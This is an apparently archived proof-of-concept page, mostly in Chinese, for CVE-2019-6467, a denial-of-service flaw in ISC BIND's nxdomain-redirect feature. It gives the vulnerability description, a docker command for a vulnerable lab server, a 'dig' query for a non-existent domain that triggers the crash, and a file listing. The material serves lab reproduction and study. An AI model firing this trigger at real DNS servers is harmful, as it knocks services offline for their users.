POC详情: ec74838cc68955dcde887760735ddd0c8a2256db

来源
关联漏洞
标题: ISC BIND 安全漏洞 (CVE-2019-6467)
描述:ISC BIND是美国ISC公司的一套实现了DNS协议的开源软件。 ISC BIND 9.12.0版本至9.12.4版本和9.14.0版本(包括:9.13 development branch版本)中的nxdomain-redirect功能存在安全漏洞。攻击者可利用该漏洞造成BIND退出,导致拒绝服务。
描述
CVE-2019-6467 (BIND nxdomain-redirect)
介绍
# CVE-2019-6467
BIND nxdomain-redirect

For educational purposes only

![demo](imgs/cve-2019-6467.gif)

## Run

```
$ docker run --rm --name cve-2019-6467 -it -p 53:53/udp knqyf263/cve-2019-6467
```

## Exploit
Normal query

```
$ dig @127.0.0.1 nxdomain.example.com
```

`nxdomain` can be replaced by anything that means non-existent domain name. (e.g. foobar.example.com)


## Reference
- https://ftp.isc.org/isc/bind/9.12.4-P1/RELEASE-NOTES-bind-9.12.4-P1.html
- https://ftp.isc.org/isc/bind9/9.14.1/RELEASE-NOTES-bind-9.14.1.html
文件快照

[4.0K] /data/pocs/ec74838cc68955dcde887760735ddd0c8a2256db ├── [4.0K] contents │   ├── [ 655] example.com.zone │   ├── [ 37] named │   └── [1.9K] named.conf ├── [1.8K] Dockerfile ├── [4.0K] imgs │   └── [1.5M] cve-2019-6467.gif ├── [1.0K] LICENSE └── [ 534] README.md 2 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。